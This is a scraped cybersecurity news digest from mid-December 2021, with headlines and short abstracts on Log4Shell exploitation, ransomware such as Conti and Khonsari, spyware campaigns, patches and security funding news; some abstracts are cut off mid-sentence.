Conti ransomware uses Log4j bug to hack VMware vCenter servers Full Text
Abstract
Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.BleepingComputer
December 17, 2021 – Attack
PseudoManuscrypt, a mysterious massive cyber espionage campaign Full Text
Abstract
Tens of thousands of devices worldwide, including many industrial control systems (ICS), have been hit by the PseudoManuscrypt spyware. Kaspersky researchers reported that tens of thousands of devices belonging to industrial and government organizations...Security Affairs
December 17, 2021 – Vulnerabilities
All Log4j, logback bugs we know so far and why you MUST ditch 2.15 Full Text
Abstract
Everyone's heard of the critical log4j zero-day by now. Dubbed 'Log4Shell,' the vulnerability has set the internet on fire. Below we summarize the four or more CVEs identified thus far, and pretty good reasons to ditch log4j version 2.15.0 for 2.16.0.BleepingComputer
December 16, 2021 – Hacker
‘Tropic Trooper’ Reemerges to Target Transportation Outfits Full Text
Abstract
Analysts warn that the attack group, now known as ‘Earth Centaur,’ is honing its attacks to go after transportation and government agencies.Threatpost
December 16, 2021 – Attack
‘PseudoManuscrypt’ Mass Spyware Campaign Targets 35K Systems Full Text
Abstract
It’s similar to Lazarus’s Manuscrypt malware, but the new spyware is splattering itself onto government organizations and ICS in a non-Lazarus-like, untargeted wave of attacks.Threatpost
December 16, 2021 – Malware
‘DarkWatchman’ RAT Shows Evolution in Fileless Malware Full Text
Abstract
The new tool manipulates Windows Registry in unique ways to evade security detections and is likely being used by ransomware groups for initial network access.Threatpost
December 16, 2021 – Botnet
New Phorpiex Botnet Variant Steals Half a Million Dollars in Cryptocurrency Full Text
Abstract
Cryptocurrency users in Ethiopia, Nigeria, India, Guatemala, and the Philippines are being targeted by a new variant of the Phorpiex botnet called Twizt that has resulted in the theft of virtual coins amounting to $500,000 over the last one year. Israeli security firm Check Point Research, which detailed the attacks, said the latest evolutionary version "enables the botnet to operate successfully without active [command-and-control] servers," adding it supports no less than 35 wallets associated with different blockchains, including Bitcoin, Ethereum, Dash, Dogecoin, Litecoin, Monero, Ripple, and Zilliqa, to facilitate crypto theft. Phorpiex , otherwise known as Trik, is known for its sextortion spam and ransomware campaigns as well as cryptojacking, a scheme that leverages the targets' devices such as computers, smartphones, and servers to secretly mine cryptocurrency without their consent or knowledge. It's also infamous for its use of a technique called cryThe Hacker News
December 16, 2021 – Attack
Log4j attackers switch to injecting Monero miners via RMI Full Text
Abstract
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.BleepingComputer
December 16, 2021 – General
Web App Attacks Rise by 251% in Two Years Full Text
Abstract
Web app attacks have surged by 22% on average every quarter. Attacks on businesses in the U.K have increased by 250% during this period. This increase has, in turn, caused a rise in data breaches.Cyware Alerts - Hacker News
December 16, 2021 – Vulnerabilities
Officials point to Apache vulnerability in urging passage of cyber incident reporting bill Full Text
Abstract
Key federal cybersecurity officials are pushing for passage of legislation to create mandates for certain organizations to report cyberattacks amid the fallout from a massive vulnerability in Apache logging package log4j, which has left organizations worldwide vulnerable.The Hill
December 16, 2021 – Vulnerabilities
Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips Full Text
Abstract
Cybersecurity researchers have demonstrated a new attack technique that makes it possible to leverage a device's Bluetooth component to directly extract network passwords and manipulate traffic on a Wi-Fi chip. The novel attacks work against the so-called "combo chips," which are specialized chips that are equipped to handle different types of radio wave-based wireless communications, such as Wi-Fi, Bluetooth, and LTE. "We provide empirical evidence that coexistence, i.e., the coordination of cross-technology wireless transmissions, is an unexplored attack surface," a group of researchers from the Technical University of Darmstadt's Secure Mobile Networking Lab and the University of Brescia said in a new paper . "Instead of escalating directly into the mobile [operating system], wireless chips can escalate their privileges into other wireless chips by exploiting the same mechanisms they use to arbitrate their access to the resources they share, i.eThe Hacker News
December 16, 2021 – General
Cyber Command Is in the Ransomware Game—Now What? Full Text
Abstract
Some unresolved questions that policymakers must consider in exploring a role for the military in countering ransomware.Lawfare
December 16, 2021 – Vulnerabilities
Flaws in Lenovo laptops allow escalating to admin privileges Full Text
Abstract
The ImControllerService service of Lenovo laptops is affected by a privilege elevation bug that can allow to execute commands with admin privileges. Lenovo laptops, including ThinkPad and Yoga families, are affected by a privilege elevation issues...Security Affairs
December 16, 2021 – General
Facebook disrupts operations of seven surveillance-for-hire firms Full Text
Abstract
Facebook has disrupted the operations of seven different spyware-making companies, blocking their Internet infrastructure, sending cease and desist letters, and banning them from its platform.BleepingComputer
December 16, 2021 – Attack
More Details on Log4Shell Attacks Full Text
Abstract
A few days back, we got to know that threat actors are abusing a critical vulnerability—Log4Shell—in Log4j and propagating malware. Now, the attacks have grown more severe as new details emerge.Cyware Alerts - Hacker News
December 16, 2021 – Government
US concerns grow over potential Russian cyber targeting of Ukraine amid troop buildup Full Text
Abstract
The increase in tensions between the United States and Russia due to Moscow amassing troops on the border with Ukraine is raising concerns Russia may not only put boots on the ground but also turn to hacking operations to put pressure on the U.S. and Ukraine.The Hill
December 16, 2021 – Education
The Guide to Automating Security Training for Lean Security Teams Full Text
Abstract
Cyber threats used to be less threatening. While nobody wants their customers' credit card numbers stolen in a data breach, or to see a deranged manifesto plastered over their company website, such incidents can almost seem quaint compared to ransomware attacks that bring all of your critical information systems to a dead halt. The frequency of these attacks increased more than 150% in the U.S. last year, and in 2021 their global cost is expected to reach $20 billion. Effective, comprehensive security training is essential to mitigating these threats, many of which originate with low-profile phishing or malware attacks to get a foot in the door—attacks that can target anyone who works in your organization. A company's employees are the front line of defense against cyberattacks, and canned training videos and short quizzes are rarely sufficient to prepare them for this responsibility. The trouble with good training is that it takes not just expertise but time and other resoThe Hacker News
December 16, 2021 – Vulnerabilities
While attackers begin exploiting a second Log4j flaw, a third one emerges Full Text
Abstract
Experts warn that threat actors are actively attempting to exploit a second bug disclosed in the popular Log4j logging library. American web infrastructure and website security company Cloudflare warns that threat actors are actively attempting...Security Affairs
December 16, 2021 – Attack
McMenamins breweries hit by a Conti ransomware attack Full Text
Abstract
Portland brewery and hotel chain McMenamins suffered a Conti ransomware attack over the weekend that disrupted the company's operations.BleepingComputer
December 16, 2021 – Malware
Anubis Banking Trojan Resurfaces to Cripple Over 400 Financial Firms Full Text
Abstract
A new campaign by Anubis banking trojan is aimed at nearly 400 financial institutions. Hackers masqueraded the official account management app for Orange Telecom. The malware collects significant information of victims by intercepting SMS, screen monitoring, GPS data collection, keylogging, file e ... Read MoreCyware Alerts - Hacker News
December 16, 2021 – Government
Officials warn of increased hacking threat during holiday season Full Text
Abstract
Senior Biden administration cybersecurity officials warned business leaders Thursday to be on guard against cyberattacks during the upcoming holiday season, noting that hackers are often more active when Americans are taking time away from work.The Hill
December 16, 2021 – Malware
New Fileless Malware Uses Windows Registry as Storage to Evade Detection Full Text
Abstract
A new JavaScript-based remote access Trojan (RAT) propagated via a social engineering campaign has been observed employing sneaky "fileless" techniques as part of its detection-evasion methods to elude discovery and analysis. Dubbed DarkWatchman by researchers from Prevailion's Adversarial Counterintelligence Team (PACT), the malware uses a resilient domain generation algorithm ( DGA ) to identify its command-and-control (C2) infrastructure and utilizes the Windows Registry for all of its storage operations, thereby enabling it to bypass antimalware engines. The RAT "utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation," researchers Matt Stafford and Sherman Smith said , adding it "represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to oThe Hacker News
December 16, 2021 – Hacker
Multiple Nation-State actors are exploiting Log4Shell flaw Full Text
Abstract
Nation-state actors from China, Iran, North Korea, and Turkey are attempting to exploit the Log4Shell vulnerability to in attacks in the wild. Microsoft researchers reported that Nation-state actors from China, Iran, North Korea, and Turkey are now abusing...Security Affairs
December 16, 2021 – Solution
Google Calendar now lets you block invitation phishing attempts Full Text
Abstract
Google now makes it easy to block unwanted calendar invitations, commonly used by threat actors in phishing and malicious campaigns, from being added to your Google Calendar.BleepingComputer
December 16, 2021 – Privacy
PseudoManuscrypt Spyware Campaign Targets Thousands of ICS Computers Worldwide Full Text
Abstract
This new malware contains advanced spying capabilities and has been seen targeting both government organizations and industrial control systems (ICS) across numerous industries.Yahoo! Finance
December 16, 2021 – Malware
Owowa, a malicious IIS Server module used to steal Microsoft Exchange credentials Full Text
Abstract
Threat actors are using a malicious Internet Information Services (IIS) Server module, dubbed Owowa, to steal Microsoft Exchange credentials. Kaspersky researchers spotted malicious actors while deploying a previously undiscovered binary, an Internet...Security Affairs
December 16, 2021 – Ransomware
Microsoft: Khonsari ransomware hits self-hosted Minecraft servers Full Text
Abstract
Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability.BleepingComputer
December 16, 2021 – Attack
Portland-based Hotel and Brewpub Chain Suffers Cyberattack Likely Impacting Employee Data Full Text
Abstract
Hotel and brewpub chain McMenamins was hit with a ransomware attack that may have compromised employees' personal information, but no customer payment information appears to have been impacted.KGW
December 16, 2021 – Breach
Gumtree classifieds site leaked personal info via the F12 key Full Text
Abstract
British classifieds site Gumtree.com suffered a data leak after a security researcher revealed that he could access sensitive personally identifiable data of advertisers simply by pressing F12 on the keyboard.BleepingComputer
December 16, 2021 – Business
Noname Security Raises $135 Million at ‘Unicorn’ Valuation Full Text
Abstract
The Silicon Valley-based startup came out of stealth in December 2020, and closed a $60 million Series B funding round in June 2021. To date, the company has raised $220 million.Security Week
December 16, 2021 – Vulnerabilities
Lenovo laptops vulnerable to bug allowing admin privileges Full Text
Abstract
Lenovo laptops, including ThinkPad and Yoga models, are vulnerable to a privilege elevation bug in the ImControllerService service allowing attackers to execute commands with admin privileges.BleepingComputer
December 16, 2021 – Criminals
How expired web domains help criminal hackers unlock enterprise defenses Full Text
Abstract
Organizations allow domains to expire for a number of reasons. Sometimes it’s a simple mistake: a domain renewal is overlooked because a payment method has expired or the renewal contact has moved on.The Daily Swig
December 16, 2021 – Ransomware
Hive ransomware enters big league with hundreds breached in four months Full Text
Abstract
The Hive ransomware gang is more active and aggressive than its leak site shows, with affiliates attacking an average of three companies every day since the operation became known in late June.BleepingComputer
December 16, 2021 – General
What SMBs can do to protect against Log4Shell attacks Full Text
Abstract
This flaw allows hackers to worm their way into unpatched systems to take control. It’s can endanger any endpoint because of its ultra-wide attack surface and the accompanying damage potential.Malwarebytes Labs
December 16, 2021 – Botnet
Phorpiex botnet returns with new tricks making it harder to disrupt Full Text
Abstract
The previously shutdown Phorpiex botnet has re-emerged with new peer-to-peer command and control infrastructure, making the malware more difficult to disrupt.BleepingComputer
December 16, 2021 – Botnet
Variant of Phorpiex Botnet Used for Cryptocurrency Attacks in Ethopia, Nigeria, India, and 93 Other Countries Full Text
Abstract
The cybercriminals behind the attacks are using a variant of the Phorpiex botnet -- dubbed "Twizt" -- to steal cryptocurrency through a process called "crypto clipping" from users across 96 countries.ZDNet
December 16, 2021 – Solution
Firefox users can’t reach Microsoft.com — here’s what to do Full Text
Abstract
Those using the Mozilla Firefox web browser are left unable to access Microsoft.com domain. Tests by BleepingComputer confirm the issue relates to SSL certificate validation errors. Below we explain what can you do to remedy the issue.BleepingComputer
December 16, 2021 – Breach
After theft of $77.7 million, victim AscendEX to reimburse customers Full Text
Abstract
In a series of Tweets, the company said it is in the process of "standing up a new hot wallet infrastructure" and estimated that deposits and withdrawals would resume over the next two days.ZDNet
December 15, 2021 – Malware
Malicious Exchange Server Module Hoovers Up Outlook Credentials Full Text
Abstract
“Owowa” stealthily lurks on IIS servers, waiting to harvest successful logins when an Outlook Web Access (OWA) authentication request is made.Threatpost
December 15, 2021 – Denial Of Service
Apache’s Fix for Log4Shell Can Lead to DoS Attacks Full Text
Abstract
Not only is the jaw-dropping flaw in the Apache Log4j logging library ubiquitous; Apache’s blanket of a quickly baked patch for Log4Shell also has holes.Threatpost
December 15, 2021 – Hacker
Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges Full Text
Abstract
Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware. The new vulnerability, assigned the identifier CVE-2021-45046 , makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0. "This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0," Cloudflare's Andre Bluehs and GabrielThe Hacker News
December 15, 2021 – General
Relentless Log4j Attacks Include State Actors, Possible Worm Full Text
Abstract
More than 1.8 million attacks, against half of all corporate networks, have already launched to exploit Log4Shell.Threatpost
December 15, 2021 – Malware
Emotet starts dropping Cobalt Strike again for faster attacks Full Text
Abstract
Right in time for the holidays, the notorious Emotet malware is once again directly installing Cobalt Strike beacons for rapid cyberattacks.BleepingComputer
December 15, 2021 – Business
Cequence adds $60M Series C to improve API security Full Text
Abstract
Menlo Ventures led the latest round with participation from Icon Ventures, Telstra Ventures, HarbourVest Partners, Shasta Ventures, Dell Technologies Capital, and T-Mobile Ventures.TechCrunch
December 15, 2021 – Business
Zoom joins counterterrorism tech group Full Text
Abstract
Video conferencing platform Zoom has joined an independent counterterrorism group that shares information among major tech companies to combat violence and extremism.The Hill
December 15, 2021 – Business
Facebook to Pay Hackers for Reporting Data Scraping Bugs and Scraped Datasets Full Text
Abstract
Meta Platforms, the company formerly known as Facebook, has announced that it's expanding its bug bounty program to start rewarding valid reports of scraping vulnerabilities across its platforms as well as include reports of scraping data sets that are available online. "We know that automated activity designed to scrape people's public and private data targets every website or service," said Dan Gurfinkel, security engineering manager at Meta. "We also know that it is a highly adversarial space where scrapers — be it malicious apps, websites or scripts — constantly adapt their tactics to evade detection in response to the defenses we build and improve." To that end, the social media giant aims to monetarily compensate for valid reports of scraping bugs in its service and identify unprotected or openly public databases containing no less than 100,000 unique Facebook user records with personally identifiable information (PII) such as email, phone numbThe Hacker News
December 15, 2021 – Ransomware
The Strategic Intelligence Value of Ransomware Full Text
Abstract
Foreign intelligence services can siphon a wealth of information from ransomware operations that are of operational and strategic value.Lawfare
December 15, 2021 – Criminals
FBI’s investigation accidentally revealed the HelloKitty ransomware gang operates out of Ukraine Full Text
Abstract
While investigating a data breach suffered by a healthcare organization, FBI accidentally revealed that it believes that the HelloKitty ransomware gang operates out of Ukraine. The investigation conducted by FBI on a recent data breach suffered by an Oregon...Security Affairs
December 15, 2021 – Vulnerabilities
SAP Kicks Log4Shell Vulnerability Out of 20 Apps Full Text
Abstract
SAP’s still feverishly working to patch another 12 apps vulnerable to the Log4Shell flaw, while its Patch Tuesday release includes 21 other fixes, some rated at 9.9 criticality.Threatpost
December 15, 2021 – Phishing
Large-scale phishing study shows who bites the bait more often Full Text
Abstract
A large-scale phishing study involving 14,733 participants over a 15-month experiment has produced some surprising findings that contradict previous research results that formed the basis for popular industry practices.BleepingComputer
December 15, 2021 – Hacker
Seedworm Targeting Telecom, IT, and Utility firms in the Middle East and Asia Full Text
Abstract
Symantec revealed that the Iranian MuddyWater group has been targeting telecom operators, IT firms, and a utility company in the Middle East and other parts of Asia. Researchers observed that the attackers made a deliberate attempt to target more and more organizations by mounting a supply-chain at ... Read MoreCyware Alerts - Hacker News
December 15, 2021 – Hacker
China, Iran among those exploiting Apache cyber vulnerability, researchers say Full Text
Abstract
State-sponsored hackers from countries including Iran and China are actively exploiting a major vulnerability in Apache logging package log4j to target vulnerable organizations around the world, security researchers found this week.The Hill
December 15, 2021 – Solution
Cynet’s MDR Offers Organizations Continuous Security Oversight Full Text
Abstract
Today's cyber attackers are constantly looking for ways to exploit vulnerabilities and infiltrate organizations. To keep up with this evolving threat landscape, security teams must be on the lookout for potential risks around the clock. Since most organizations simply cannot afford to have 24x7 security teams, managed detection and response (MDR) services have become a critical aspect of any modern security stack. Most organizations must find outsourced MDR providers on top of their existing solutions, but that's not always a feasible solution. XDR provider Cynet offers its MDR service ( learn more here ), which the company calls CyOps, as part of its offering. The service is much more than simply a help desk, though. CyOps offers a thorough MDR service that offers both monitoring and threat hunting, as well as incident response in cases where an attack is successful. How CyOps operates The key selling point for CyOps MDR is that it enhances organizations' security aThe Hacker News
December 15, 2021 – Vulnerabilities
Microsoft December 2021 Patch Tuesday fixes an actively exploited zero-day Full Text
Abstract
Microsoft December 2021 Patch Tuesday addresses 67 vulnerabilities, including an actively exploited Windows Installer vulnerability. Microsoft December 2021 Patch Tuesday addressed 67 vulnerabilities in Microsoft Windows and Windows Components, ASP.NET...Security Affairs
December 15, 2021 – Government
CISA warns critical infrastructure to stay vigilant for ongoing threats Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) warned critical infrastructure organizations today to strengthen their cybersecurity defenses against potential and ongoing threats.BleepingComputer
December 15, 2021 – Business
Cylus raises $30M Series B to help protect trains and metros worldwide Full Text
Abstract
The Series B funding round was led by Ibex Investors, with participation from Vertex Growth Fund, Strides International Business, Magma Venture Partners, Vertex Ventures Israel, and GlenRock Israel.TechCrunch
December 15, 2021 – Hacker
Hackers Using Malicious IIS Server Module to Steal Microsoft Exchange Credentials Full Text
Abstract
Malicious actors are deploying a previously undiscovered binary, an Internet Information Services ( IIS ) webserver module dubbed " Owowa ," on Microsoft Exchange Outlook Web Access servers with the goal of stealing credentials and enabling remote command execution. "Owowa is a C#-developed .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange's Outlook Web Access (OWA)," Kaspersky researchers Paul Rascagneres and Pierre Delcher said . "When loaded this way, Owowa will steal credentials that are entered by any user in the OWA login page, and will allow a remote operator to run commands on the underlying server." The idea that a rogue IIS module can be fashioned as a backdoor is not new. In August 2021, Slovak cybersecurity company ESET's study of the IIS landscape revealed as many as 14 malware families that were developed as native IIS modules in an attempt to intercept HTTP trafficThe Hacker News
December 15, 2021 – APT
Iran-linked Seedworm APT targets Telecoms organizations across the Middle East and Asia Full Text
Abstract
Researchers uncovered a new Seedworm campaign targeting telecommunication and IT service providers in the Middle East and Asia. Iran-linked APT group Seedworm (aka MERCURY, MuddyWater, TEMP.Zagros, or Static Kitten) is behind a new cyberespionage...Security Affairs
December 15, 2021 – Hacker
State-sponsored hackers abuse Slack API to steal airline data Full Text
Abstract
A suspected Iranian state-supported threat actor is deploying a newly discovered backdoor named 'Aclip' that abuses the Slack API for covert communications.BleepingComputer
December 15, 2021 – Criminals
Hackers Steal $140 Million from Users of Crypto Gaming Company Full Text
Abstract
The hackers stole the private keys to access 96 wallets, siphoning off 4.5 million PYR, which is VulcanForge's token that can be used across its ecosystem, the company said in a series of tweets.Vice
December 15, 2021 – Government
DHS announces its ‘Hack DHS’ bug bounty program Full Text
Abstract
The DHS has launched a new bug bounty program dubbed 'Hack DHS' to discover security vulnerabilities in external DHS systems. The Department of Homeland Security (DHS) has launched a new bug bounty program dubbed 'Hack DHS' that allows vetted white...Security Affairs
December 15, 2021 – Hacker
Log4j vulnerability now used by state-backed hackers, access brokers Full Text
Abstract
As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Log4j Java-based logging library.BleepingComputer
December 15, 2021 – Government
US government to offer up to $5,000 ‘bounty’ to hackers to identify cyber vulnerabilities Full Text
Abstract
The DHS is launching a "bug bounty" program, potentially offering thousands of dollars to hackers who help the department identify cybersecurity vulnerabilities within its systems.CNN Money
December 15, 2021 – Skimming
Sites hacked with credit card stealers undetected for months Full Text
Abstract
Threat actors are gearing up for the holidays with credit card skimming attacks remaining undetected for months as payment information is stolen from customers.BleepingComputer
December 15, 2021 – General
National cyber resilience requires closer integration of public and private efforts Full Text
Abstract
Beyond intel sharing, the government and industry must boost sharing of best practices, and help each other implement these playbooks, especially for entities that support national critical functions.Cyberscoop
December 15, 2021 – Business
Sysdig Raises $350 Million at $2.5 Billion Valuation Full Text
Abstract
The latest funding round was led by Permira, with participation from Guggenheim Partners, Accel, Bain Capital Ventures, DFJ Growth, Glynn Capital, Goldman Sachs, Insight Partners, Next47, and others.Security Week
December 14, 2021 – General
2022: Supply-Chain Chronic Pain & SaaS Security Meltdowns Full Text
Abstract
Sounil Yu, CISO at JupiterOne, discusses the growing mesh of integrations between SaaS applications, which enables automated business workflows – and rampant lateral movement by attackers, well outside IT’s purview.Threatpost
December 14, 2021 – Vulnerabilities
Apple iOS Update Fixes Cringey iPhone 13 Jailbreak Exploit Full Text
Abstract
It took just 15 seconds to hack the latest, greatest, shiniest iPhone 13 Pro on stage at the Tianfu Cup in October, using a now-fixed iOS kernel bug.Threatpost
December 14, 2021 – Vulnerabilities
Microsoft Issues Windows Update to Patch 0-Day Used to Spread Emotet Malware Full Text
Abstract
Microsoft has rolled out Patch Tuesday updates to address multiple security vulnerabilities in Windows and other software, including one actively exploited flaw that's being abused to deliver Emotet, TrickBot, or Bazaloader malware payloads. The latest monthly release for December fixes a total of 67 flaws, bringing the total number of bugs patched by the company this year to 887, according to the Zero Day Initiative . Seven of the 67 flaws are rated Critical and 60 are rated as Important in severity, with five of the issues publicly known at the time of release. It's worth noting that this is in addition to the 21 flaws resolved in the Chromium-based Microsoft Edge browser. The most critical of the lot is CVE-2021-43890 (CVSS score: 7.1), a Windows AppX installer spoofing vulnerability that Microsoft said could be exploited to achieve arbitrary code execution. The lower severity rating is indicative of the fact that code execution hinges on the logged-on user level,The Hacker News
December 14, 2021 – General
What the Log4Shell Bug Means for SMBs: Experts Weigh In Full Text
Abstract
An exclusive roundtable of security researchers discuss the specific implications of CVE-2021-44228 for smaller businesses, including what’s vulnerable, what an attack looks like and to how to remediate.Threatpost
December 14, 2021 – Vulnerabilities
Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released Full Text
Abstract
The Apache Software Foundation (ASF) has pushed out a new fix for the Log4j logging utility after the previous patch for the recently disclosed Log4Shell exploit was deemed as "incomplete in certain non-default configurations." The second vulnerability — tracked as CVE-2021-45046 — is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0, which the project maintainers shipped last week to address a critical remote code execution vulnerability (CVE-2021-44228) that could be abused to infiltrate and take over systems. The incomplete patch for CVE-2021-44228 could be abused to "craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS) attack," the ASF said in a new advisory. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), all but removes support for message lookups and disables JNDI by default, theThe Hacker News
December 14, 2021 – Attack
Telecom operators targeted in recent espionage hacking campaign Full Text
Abstract
Researchers have spotted a new espionage campaign targeting telecommunication and IT service providers in the Middle East and Asia.BleepingComputer
December 14, 2021 – General
Americans Lost Almost $150 Million to Gift Card Scams: FTC Full Text
Abstract
Almost 40,000 consumers reported falling victim to scams that involved gift cards as a payment method. This year, Target gift cards remained the top choice among cybercriminals.Cyware Alerts - Hacker News
December 14, 2021 – Vulnerabilities
DHS announces bug bounty program to hunt down cyber vulnerabilities Full Text
Abstract
The Department of Homeland Security (DHS) on Tuesday announced a new bug bounty program meant to help tackle cyber vulnerabilities in the agency.The Hill
December 14, 2021 – Hacker
Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware Full Text
Abstract
Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability . The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files. The vulnerability is tracked as CVE-2021-44228 and is also known by the monikers "Log4Shell" or "Logjam." In simple terms, the bug could force an affected system to download malicious software, giving the attackers a digital beachhead on servers located within corporate networks. Log4j is an open-source Java library maintained by the nonprofit Apache Software FThe Hacker News
December 14, 2021 – Vulnerabilities
Adobe addresses over 60 vulnerabilities in multiple products Full Text
Abstract
Adobe warns of threat actors that could exploit critical vulnerabilities in multiple products running on Windows and macOS systems. Adobe has issued critical warnings for more than 60 vulnerabilities in multiple products running on Windows and macOS...Security Affairs
December 14, 2021 – Attack
400 Banks’ Customers Targeted with Anubis Trojan Full Text
Abstract
The new campaign masqueraded as an Orange Telecom account management app to deliver the latest iteration of Anubis banking malware.Threatpost
December 14, 2021 – Ransomware
New ransomware now being deployed in Log4Shell attacks Full Text
Abstract
The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers.BleepingComputer
December 14, 2021 – Outage
Second Cyberattack Within a Week Disrupts COVID-19 Vaccine Certification in Brazil Full Text
Abstract
Brazil's Ministry of Health has suffered a second cyberattack in less than a week, which has compromised various internal systems, including the platform that holds COVID-19 vaccination data.ZDNet
December 14, 2021 – Government
USPS secretly tested mobile voting system: report Full Text
Abstract
The U.S. Postal Service worked on a secret project to test a blockchain-based mobile phone voting system ahead of the 2020 elections before ultimately abandoning the project, according to The Washington Post.The Hill
December 14, 2021 – Education
How Extended Security Posture Management Optimizes Your Security Stack Full Text
Abstract
As a CISO, one of the most challenging questions to answer is "How well are we protected right now?" Between the acceleration of hackers' offensive capabilities and the dynamic nature of information networks, a drift in the security posture is unavoidable and needs to be continuously compensated. Therefore, answering that question implies continuously validating the security posture and being in a position to check it including, against the latest emerging threats. Yet, the bulk of cybersecurity is focused on defensive tools. The combination of the rapid evolution of technology and the multiplication of technology layers, combined with the professionalization of the threat landscape, has led to a profusion of cybersecurity tools tackling different security aspects. Checking the cybersecurity solution stack efficiency is typically done through pen-testing or, more recently, through red teaming – an exercise aimed to map possible loopholes that would lead to a data breacThe Hacker News
December 14, 2021 – Ransomware
Hackers exploit Log4Shell to drop Khonsari Ransomware on Windows systems Full Text
Abstract
Bitdefender researchers discovered that threat actors are attempting to exploit the Log4Shell flaw to deliver the new Khonsari ransomware on Windows machines. Bitdefender researchers discovered that threat actors are attempting to exploit the Log4Shell...Security Affairs
December 14, 2021 – Hacker
‘Seedworm’ Attackers Target Telcos in Asia, Middle East Full Text
Abstract
The focused attacks aimed at cyberespionage and lateral movement appear to hint at further ambitions by the group, including supply-chain threats.Threatpost
December 14, 2021 – Government
DHS announces ‘Hack DHS’ bug bounty program for vetted researchers Full Text
Abstract
The Department of Homeland Security (DHS) has launched a new bug bounty program dubbed "Hack DHS" that allows vetted cybersecurity researchers to find and report security vulnerabilities in external DHS systems.BleepingComputer
December 14, 2021 – Government
CISA tells federal agencies to patch Log4Shell before Christmas Full Text
Abstract
Federal agencies have ten days to test which of their internal apps and servers utilize the Log4j Java library, check if systems are vulnerable to the Log4Shell exploit, and patch affected servers.The Record
December 14, 2021 – Attack
Human resource management group hit by ransomware attack Full Text
Abstract
Ultimate Kronos Group (UKG), a human resources management provider, was hit by a ransomware attack earlier this week, the company confirmed.The Hill
December 14, 2021 – Government
US CISA orders federal agencies to fix Log4Shell by December 24th Full Text
Abstract
US CISA ordered federal agencies to address the critical Log4Shell vulnerability in the Log4j library by December 24th, 2021. US CISA ordered federal agencies to address the critical Log4Shell vulnerability in the Log4j library by December 24th,...Security Affairs
December 14, 2021 – Vulnerabilities
Microsoft fixes Windows AppX Installer zero-day used by Emotet Full Text
Abstract
Microsoft has patched a high severity Windows zero-day vulnerability exploited in the wild to deliver Emotet malware payloads.BleepingComputer
December 14, 2021 – Criminals
Forget the dark web: ransomware gangs weaponize social media to pressure victims Full Text
Abstract
In an effort to amplify coverage, some ransomware groups are using social media channels to bring news of their conquests to a wider audience and put more pressure on victims to pay the ransom.Emsisoft
December 14, 2021 – Attack
Virginia General Assembly’s IT unit hit by ransomware attack Full Text
Abstract
The information technology unit for Virginia’s General Assembly has been hit by a ransomware attack, which barred legislators and staff from accessing the system that handles bills.The Hill
December 14, 2021 – Vulnerabilities
Google fixed the 17th zero-day in Chrome since the start of the year Full Text
Abstract
Google has released Chrome 96.0.4664.110 to address a high-severity zero-day vulnerability, tracked as CVE-2021-4102, exploited in the wild. Google released security updates to address five vulnerabilities in the Chrome web browser, including...Security Affairs
December 14, 2021 – Vulnerabilities
Microsoft December 2021 Patch Tuesday fixes 6 zero-days, 67 flaws Full Text
Abstract
Today is Microsoft's December 2021 Patch Tuesday, and with it comes fixes for six zero-day vulnerabilities and a total of 67 flaws. These updates include a fix for an actively exploited Windows Installer vulnerability used in malware distribution campaigns.BleepingComputer
December 14, 2021 – Malware
Owowa: the add-on that turns your OWA into a credential stealer and remote access panel Full Text
Abstract
Owowa is a C#-based .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange’s Outlook Web Access (OWA) to credential theft and remote access.Kaspersky Labs
December 14, 2021 – Vulnerabilities
Cyber experts express growing alarm over Apache vulnerability Full Text
Abstract
A vulnerability in a widely used logging platform uncovered late last week has left security professionals and officials scrambling to respond and patch systems before other nations and cybercriminals can exploit the flaw.The Hill
December 14, 2021 – Malware
TinyNuke banking malware targets French organizations Full Text
Abstract
The TinyNuke malware is back and now was used in attacks aimed at French users working in manufacturing, technology, construction, and business services. Proofpoint researchers uncovered a campaign exclusively targeting French entities and organizations...Security Affairs
December 14, 2021 – Solution
Microsoft rolls out end-to-end encryption for Teams calls Full Text
Abstract
Microsoft announced today the general availability of end-to-end encryption (E2EE) support for one-to-one Microsoft Teams calls.BleepingComputer
December 14, 2021 – Ransomware
Inside Ireland’s Public Healthcare Ransomware Scare – Krebs on Security Full Text
Abstract
The consulting firm PricewaterhouseCoopers recently published lessons learned from the disruptive and costly ransomware attack in May 2021 on Ireland’s public health system.Krebs on Security
December 14, 2021 – Hacker
Hackers steal Microsoft Exchange credentials using IIS module Full Text
